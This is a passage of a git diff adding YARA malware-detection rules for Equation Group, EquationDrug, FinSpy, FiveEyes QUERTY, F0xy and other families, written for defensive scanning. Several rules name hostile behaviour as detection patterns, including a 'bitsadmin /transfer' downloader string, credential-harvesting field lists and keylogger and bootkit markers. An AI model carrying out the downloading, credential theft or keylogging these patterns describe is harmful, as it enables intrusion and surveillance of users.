+ $s1 = "x:\\fanny.bmp" fullword ascii
+ $s2 = "32.exe" fullword ascii
+ $s3 = "d:\\fanny.bmp" fullword ascii
+
+ $x1 = "c:\\windows\\system32\\kernel32.dll" fullword ascii
+ $x2 = "System\\CurrentControlSet\\Services\\USBSTOR\\Enum" fullword ascii
+ $x3 = "System\\CurrentControlSet\\Services\\PartMgr\\Enum" fullword ascii
+ $x4 = "\\system32\\win32k.sys" fullword wide
+ $x5 = "\\AGENTCPD.DLL" fullword ascii
+ $x6 = "agentcpd.dll" fullword ascii
+ $x7 = "PADupdate.exe" fullword ascii
+ $x8 = "dll_installer.dll" fullword ascii
+ $x9 = "\\restore\\" fullword ascii
+ $x10 = "Q:\\__?__.lnk" fullword ascii
+ $x11 = "Software\\Microsoft\\MSNetMng" fullword ascii
+ $x12 = "\\shelldoc.dll" fullword ascii
+ $x13 = "file size = %d bytes" fullword ascii
+ $x14 = "\\MSAgent" fullword ascii
+ $x15 = "Global\\RPCMutex" fullword ascii
+ $x16 = "Global\\DirectMarketing" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 300000 and
+ (
+ ( 2 of ($s*) ) or
+ ( 1 of ($s*) and 6 of ($x*) ) or
+ ( 14 of ($x*) )
+ )
+}
+
+rule Equation_Kaspersky_HDD_reprogramming_module {
+ meta:
+ description = "Equation Group Malware - HDD reprogramming module"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "nls_933w.dll" fullword ascii
+
+ $s1 = "BINARY" fullword wide
+ $s2 = "KfAcquireSpinLock" fullword ascii
+ $s3 = "HAL.dll" fullword ascii
+ $s4 = "READ_REGISTER_UCHAR" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 300000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_EOP_Package {
+ meta:
+ description = "Equation Group Malware - EoP package and malware launcher"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "2bd1b1f5b4384ce802d5d32d8c8fd3d1dc04b962"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "abababababab" fullword ascii
+ $s1 = "abcdefghijklmnopq" fullword ascii
+ $s2 = "@STATIC" fullword wide
+ $s3 = "$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" fullword ascii
+ $s4 = "@prkMtx" fullword wide
+ $s5 = "prkMtx" fullword wide
+ $s6 = "cnFormVoidFBC" fullword wide
+ condition:
+ ( $mz at 0 ) and filesize < 100000 and all of ($s*)
+}
+
+rule Equation_Kaspersky_TripleFantasy_Loader {
+ meta:
+ description = "Equation Group Malware - TripleFantasy Loader"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/16"
+ hash = "4ce6e77a11b443cc7cbe439b71bf39a39d3d7fa3"
+ strings:
+ $mz = { 4d 5a }
+
+ $x1 = "Original Innovations, LLC" fullword wide
+ $x2 = "Moniter Resource Protocol" fullword wide
+ $x3 = "ahlhcib.dll" fullword wide
+
+ $s0 = "hnetcfg.HNetGetSharingServicesPage" fullword ascii
+ $s1 = "hnetcfg.IcfGetOperationalMode" fullword ascii
+ $s2 = "hnetcfg.IcfGetDynamicFwPorts" fullword ascii
+ $s3 = "hnetcfg.HNetFreeFirewallLoggingSettings" fullword ascii
+ $s4 = "hnetcfg.HNetGetShareAndBridgeSettings" fullword ascii
+ $s5 = "hnetcfg.HNetGetFirewallSettingsPage" fullword ascii
+ condition:
+ ( $mz at 0 ) and filesize < 50000 and ( all of ($x*) and all of ($s*) )
+}
+
+/* Rule generated from the mentioned keywords */
+
+rule Equation_Kaspersky_SuspiciousString {
+ meta:
+ description = "Equation Group Malware - suspicious string found in sample"
+ author = "Florian Roth"
+ reference = "http://goo.gl/ivt8EW"
+ date = "2015/02/17"
+ score = 60
+ strings:
+ $mz = { 4d 5a }
+
+ $s1 = "i386\\DesertWinterDriver.pdb" fullword
+ $s2 = "Performing UR-specific post-install..."
+ $s3 = "Timeout waiting for the \"canInstallNow\" event from the implant-specific EXE!"
+ $s4 = "STRAITSHOOTER30.exe"
+ $s5 = "standalonegrok_2.1.1.1"
+ $s6 = "c:\\users\\rmgree5\\"
+ condition:
+ ( $mz at 0 ) and filesize < 500000 and all of ($s*)
+}
+
+/* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */
+
+rule EquationDrug_NetworkSniffer1 {
+ meta:
+ description = "EquationDrug - Backdoor driven by network sniffer - mstcp32.sys, fat32.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "26e787997a338d8111d96c9a4c103cf8ff0201ce"
+ strings:
+ $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+ $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+ $s3 = "sys\\mstcp32.dbg" fullword ascii
+ $s7 = "mstcp32.sys" fullword wide
+ $s8 = "p32.sys" fullword ascii
+ $s9 = "\\Device\\%ws_%ws" fullword wide
+ $s10 = "\\DosDevices\\%ws" fullword wide
+ $s11 = "\\Device\\%ws" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_CompatLayer_UnilayDLL {
+ meta:
+ description = "EquationDrug - Unilay.DLL"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "a3a31937956f161beba8acac35b96cb74241cd0f"
+ strings:
+ $mz = { 4d 5a }
+ $s0 = "unilay.dll" fullword ascii
+ condition:
+ ( $mz at 0 ) and $s0
+}
+
+rule EquationDrug_HDDSSD_Op {
+ meta:
+ description = "EquationDrug - HDD/SSD firmware operation - nls_933w.dll"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "ff2b50f371eb26f22eb8a2118e9ab0e015081500"
+ strings:
+ $s0 = "nls_933w.dll" fullword ascii
+ condition:
+ all of them
+}
+
+rule EquationDrug_NetworkSniffer2 {
+ meta:
+ description = "EquationDrug - Network Sniffer - tdip.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "7e3cd36875c0e5ccb076eb74855d627ae8d4627f"
+ strings:
+ $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+ $s1 = "IP Transport Driver" fullword wide
+ $s2 = "tdip.sys" fullword wide
+ $s3 = "sys\\tdip.dbg" fullword ascii
+ $s4 = "dip.sys" fullword ascii
+ $s5 = "\\Device\\%ws_%ws" fullword wide
+ $s6 = "\\DosDevices\\%ws" fullword wide
+ $s7 = "\\Device\\%ws" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_NetworkSniffer3 {
+ meta:
+ description = "EquationDrug - Network Sniffer - tdip.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "14599516381a9646cd978cf962c4f92386371040"
+ strings:
+ $s0 = "Corporation. All rights reserved." fullword wide
+ $s1 = "IP Transport Driver" fullword wide
+ $s2 = "tdip.sys" fullword wide
+ $s3 = "tdip.pdb" fullword ascii
+ condition:
+ all of them
+}
+
+rule EquationDrug_VolRec_Driver {
+ meta:
+ description = "EquationDrug - Collector plugin for Volrec - msrstd.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "ee2b504ad502dc3fed62d6483d93d9b1221cdd6c"
+ strings:
+ $s0 = "msrstd.sys" fullword wide
+ $s1 = "msrstd.pdb" fullword ascii
+ $s2 = "msrstd driver" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_KernelRootkit {
+ meta:
+ description = "EquationDrug - Kernel mode stage 0 and rootkit (Windows 2000 and above) - msndsrv.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "597715224249e9fb77dc733b2e4d507f0cc41af6"
+ strings:
+ $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+ $s1 = "Parmsndsrv.dbg" fullword ascii
+ $s2 = "\\Registry\\User\\CurrentUser\\" fullword wide
+ $s3 = "msndsrv.sys" fullword wide
+ $s5 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Control\\Windows" fullword wide
+ $s6 = "\\Device\\%ws_%ws" fullword wide
+ $s7 = "\\DosDevices\\%ws" fullword wide
+ $s9 = "\\Device\\%ws" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_Keylogger {
+ meta:
+ description = "EquationDrug - Key/clipboard logger driver - msrtvd.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "b93aa17b19575a6e4962d224c5801fb78e9a7bb5"
+ strings:
+ $s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+ $s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+ $s3 = "\\DosDevices\\Gk" fullword wide
+ $s5 = "\\Device\\Gk0" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_NetworkSniffer4 {
+ meta:
+ description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "cace40965f8600a24a2457f7792efba3bd84d9ba"
+ strings:
+ $s0 = "Copyright 1999 RAVISENT Technologies Inc." fullword wide
+ $s1 = "\\systemroot\\" fullword ascii
+ $s2 = "RAVISENT Technologies Inc." fullword wide
+ $s3 = "Created by VIONA Development" fullword wide
+ $s4 = "\\Registry\\User\\CurrentUser\\" fullword wide
+ $s5 = "\\device\\harddiskvolume" fullword wide
+ $s7 = "ATMDKDRV.SYS" fullword wide
+ $s8 = "\\Device\\%ws_%ws" fullword wide
+ $s9 = "\\DosDevices\\%ws" fullword wide
+ $s10 = "CineMaster C 1.1 WDM Main Driver" fullword wide
+ $s11 = "\\Device\\%ws" fullword wide
+ $s13 = "CineMaster C 1.1 WDM" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_PlatformOrchestrator {
+ meta:
+ description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+ strings:
+ $s0 = "SERVICES.EXE" fullword wide
+ $s1 = "\\command.com" fullword wide
+ $s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+ $s3 = "LSASS.EXE" fullword wide
+ $s4 = "Windows Configuration Services" fullword wide
+ $s8 = "unilay.dll" fullword ascii
+ condition:
+ all of them
+}
+
+rule EquationDrug_NetworkSniffer5 {
+ meta:
+ description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+ strings:
+ $s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+ $s1 = "\\Registry\\User\\CurrentUser\\" fullword wide
+ $s2 = "atmdkdrv.sys" fullword wide
+ $s4 = "\\Device\\%ws_%ws" fullword wide
+ $s5 = "\\DosDevices\\%ws" fullword wide
+ $s6 = "\\Device\\%ws" fullword wide
+ condition:
+ all of them
+}
+
+rule EquationDrug_FileSystem_Filter {
+ meta:
+ description = "EquationDrug - Filesystem filter driver – volrec.sys, scsi2mgr.sys"
+ author = "Florian Roth @4nc4p"
+ reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+ date = "2015/03/11"
+ hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+ strings:
+ $s0 = "volrec.sys" fullword wide
+ $s1 = "volrec.pdb" fullword ascii
+ $s2 = "Volume recognizer driver" fullword wide
+ condition:
+ all of them
+}
diff --git a/malware/Ezcob.yar b/malware/Ezcob.yar
new file mode 100644
index 0000000..79ba19e
--- /dev/null
+++ b/malware/Ezcob.yar
@@ -0,0 +1,35 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule EzcobStrings : Ezcob Family
+{
+ meta:
+ description = "Ezcob Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ strings:
+ $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
+ $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
+ $ = "Ezcob" wide ascii
+ $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
+ $ = "20110113144935"
+
+ condition:
+ any of them
+}
+
+rule Ezcob : Family
+{
+ meta:
+ description = "Ezcob"
+ author = "Seth Hardy"
+ last_modified = "2014-06-23"
+
+ condition:
+ EzcobStrings
+}
diff --git a/malware/F0xy.yar b/malware/F0xy.yar
new file mode 100644
index 0000000..06c0965
--- /dev/null
+++ b/malware/F0xy.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ws_f0xy_downloader {
+ meta:
+ description = "f0xy malware downloader"
+ author = "Nick Griffin (Websense)"
+
+ strings:
+ $mz="MZ"
+ $string1="bitsadmin /transfer"
+ $string2="del rm.bat"
+ $string3="av_list="
+
+ condition:
+ ($mz at 0) and (all of ($string*))
+}
diff --git a/malware/FakeM.yar b/malware/FakeM.yar
new file mode 100644
index 0000000..cb1ed3a
--- /dev/null
+++ b/malware/FakeM.yar
@@ -0,0 +1,24 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule HTMLVariant : FakeM Family HTML Variant
+{
+ meta:
+ description = "Identifier for html variant of FAKEM"
+ author = "Katie Kleemola"
+ last_updated = "2014-05-20"
+
+ strings:
+ // decryption loop
+ $s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
+ //mov byte ptr [ebp - x] y, x: 0x10-0x1 y: 0-9,A-F
+ $s2 = { C6 45 F? (3?|4?) }
+
+ condition:
+ $s1 and #s2 == 16
+
+}
diff --git a/malware/FinSpy.yar b/malware/FinSpy.yar
new file mode 100644
index 0000000..189aa41
--- /dev/null
+++ b/malware/FinSpy.yar
@@ -0,0 +1,138 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule FinSpy_2
+{
+ meta:
+ description = "FinFisher FinSpy"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $password1 = /\/scomma kbd101\.sys/ wide ascii
+ $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+ $password3 = /\/scomma excel2010\.part/ wide ascii
+ $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+ $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+ $password6 = /\/scomma MSN2010\.dll/ wide ascii
+ $password7 = /\/scomma Firefox\.base/ wide ascii
+ $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+ $password9 = /\/scomma IE7setup\.sys/ wide ascii
+ $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+ $password11 = /\/scomma office2007\.cab/ wide ascii
+ $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+ $password13 = /\/scomma outlook2007\.dll/ wide ascii
+ $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+ $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+ $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+ $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+ $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+ $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+ $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+ $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+ //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+ //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+ $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+ $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii
+ $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+ $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+ $mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+ $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+ $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+ $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+ $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+ $versions1 = /(f)inspyv2/ nocase
+ $versions2 = /(f)inspyv4/ nocase
+
+ $bootkit1 = /(b)ootkit_x32driver/
+ $bootkit2 = /(b)ootkit_x64driver/
+
+ $typo1 = /(S)creenShort Recording/ wide
+
+ $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+ condition:
+ 8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
+}
+
+rule FinSpy
+{
+ meta:
+ description = "FinFisher FinSpy"
+ author = "AlienVault Labs"
+
+ strings:
+ $filter1 = "$password14"
+ $filter2 = "$screenrec7"
+ $filter3 = "$micrec"
+ $filter4 = "$skyperec3"
+ $filter5 = "$mouserec2"
+ $filter6 = "$driver"
+ $filter7 = "$janedow2"
+ $filter8 = "$bootkit2"
+
+ $password1 = /\/scomma kbd101\.sys/ wide ascii
+ $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii
+ $password3 = /\/scomma excel2010\.part/ wide ascii
+ $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii
+ $password5 = /\/stab MSVCR32\.manifest/ wide ascii
+ $password6 = /\/scomma MSN2010\.dll/ wide ascii
+ $password7 = /\/scomma Firefox\.base/ wide ascii
+ $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii
+ $password9 = /\/scomma IE7setup\.sys/ wide ascii
+ $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii
+ $password11 = /\/scomma office2007\.cab/ wide ascii
+ $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii
+ $password13 = /\/scomma outlook2007\.dll/ wide ascii
+ $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii
+
+ $screenrec1 = /(s)111o00000000\.dat/ wide ascii
+ $screenrec2 = /(t)111o00000000\.dat/ wide ascii
+ $screenrec3 = /(f)113o00000000\.dat/ wide ascii
+ $screenrec4 = /(w)114o00000000\.dat/ wide ascii
+ $screenrec5 = /(u)112Q00000000\.dat/ wide ascii
+ $screenrec6 = /(v)112Q00000000\.dat/ wide ascii
+ $screenrec7 = /(v)112O00000000\.dat/ wide ascii
+
+ //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii
+ //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii
+
+ $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii
+
+ $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii
+ $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
+ //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii
+
+ //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii
+ //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii
+
+ $driver = /\\\\\\\\\.\\\\driverw/ wide ascii
+
+ $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii
+ $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii
+
+ //$versions1 = /(f)inspyv2/ nocase
+ //$versions2 = /(f)inspyv4/ nocase
+
+ $bootkit1 = /(b)ootkit_x32driver/
+ $bootkit2 = /(b)ootkit_x64driver/
+
+ $typo1 = /(S)creenShort Recording/ wide
+
+ $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
+
+ condition:
+ (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
+}
+
diff --git a/malware/FiveEyes.yar b/malware/FiveEyes.yar
new file mode 100644
index 0000000..bed7b65
--- /dev/null
+++ b/malware/FiveEyes.yar
@@ -0,0 +1,241 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+/* FIVE EYES ------------------------------------------------------------------------------- */
+
+rule FiveEyes_QUERTY_Malwareqwerty_20121 {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20121.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "8263fb58350f3b1d3c4220a602421232d5e40726"
+ strings:
+ $s0 = "<configFileName>20121_cmdDef.xml</configFileName>" fullword ascii
+ $s1 = "<name>20121.dll</name>" fullword ascii
+ $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+ $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+ $s4 = "<platform type=\"1\">" fullword ascii
+ $s5 = "</plugin>" fullword ascii
+ $s6 = "</pluginConfig>" fullword ascii
+ $s7 = "<pluginConfig>" fullword ascii
+ $s8 = "</platform>" fullword ascii
+ $s9 = "</lpConfig>" fullword ascii
+ $s10 = "<lpConfig>" fullword ascii
+ condition:
+ 9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_sys {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20123.sys.bin"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "a0f0087bd1f8234d5e847363d7e15be8a3e6f099"
+ strings:
+ $s0 = "20123.dll" fullword ascii
+ $s1 = "kbdclass.sys" fullword wide
+ $s2 = "IoFreeMdl" fullword ascii
+ $s3 = "ntoskrnl.exe" fullword ascii
+ $s4 = "KfReleaseSpinLock" fullword ascii
+ condition:
+ all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20123_cmdDef {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
+ strings:
+ $s0 = "<shortDescription>Keystroke Collector</shortDescription>" fullword ascii
+ $s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" fullword ascii
+ $s2 = "<commands/>" fullword ascii
+ $s3 = "</version>" fullword ascii
+ $s4 = "<associatedImplantId>20121</associatedImplantId>" fullword ascii
+ $s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
+ $s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
+ $s7 = "<projectpath>plugin/Collection</projectpath>" fullword ascii
+ $s8 = "<dllDepend>None</dllDepend>" fullword ascii
+ $s9 = "<minorType>0</minorType>" fullword ascii
+ $s10 = "<pluginname>E_QwertyKM</pluginname>" fullword ascii
+ $s11 = "</comments>" fullword ascii
+ $s12 = "<comments>" fullword ascii
+ $s13 = "<majorType>1</majorType>" fullword ascii
+ $s14 = "<files>None</files>" fullword ascii
+ $s15 = "<poc>Erebus</poc>" fullword ascii
+ $s16 = "</plugin>" fullword ascii
+ $s17 = "<team>None</team>" fullword ascii
+ $s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" fullword ascii
+ $s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" fullword ascii
+ $s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
+ condition:
+ 14 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_dll {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "89504d91c5539a366e153894c1bc17277116342b"
+ strings:
+ $s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
+ $s1 = "20121.dll" fullword ascii
+ condition:
+ all of them
+}
+rule FiveEyes_QUERTY_Malwareqwerty_20123 {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20123.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
+ strings:
+ $s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
+ $s1 = "<configFileName>20123_cmdDef.xml</configFileName>" fullword ascii
+ $s2 = "<name>20123.sys</name>" fullword ascii
+ $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+ $s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" fullword ascii
+ $s5 = "<platform type=\"1\">" fullword ascii
+ $s6 = "</plugin>" fullword ascii
+ $s7 = "</pluginConfig>" fullword ascii
+ $s8 = "<pluginConfig>" fullword ascii
+ $s9 = "</platform>" fullword ascii
+ $s10 = "</lpConfig>" fullword ascii
+ $s11 = "<lpConfig>" fullword ascii
+ condition:
+ 9 of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_dll {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
+ strings:
+ $s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" fullword wide
+ $s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" fullword wide
+ $s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." fullword ascii
+ $s3 = "- Log Used (number of windows) - %d" fullword wide
+ $s4 = "- Log Limit (number of windows) - %d" fullword wide
+ $s5 = "Process or User Default Language" fullword wide
+ $s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" fullword wide
+ $s7 = "- Logging of keystrokes is switched ON" fullword wide
+ $s8 = "- Logging of keystrokes is switched OFF" fullword wide
+ $s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
+ $s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" fullword wide
+ $s11 = "FAILED to get Qwerty Status" fullword wide
+ $s12 = "- Successfully retrieved Log from Implant." fullword wide
+ $s13 = "- Logging of all Windows is toggled ON" fullword wide
+ $s14 = "- Logging of all Windows is toggled OFF" fullword wide
+ $s15 = "Qwerty FAILED to retrieve window list." fullword wide
+ $s16 = "- UNSUCCESSFUL Log Retrieval from Implant." fullword wide
+ $s17 = "The implant failed to return a valid status" fullword ascii
+ $s18 = "- Log files were NOT generated!" fullword wide
+ $s19 = "Windows 2000/XP: Armenian. This is Unicode only." fullword wide
+ $s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" fullword wide
+ condition:
+ 10 of them
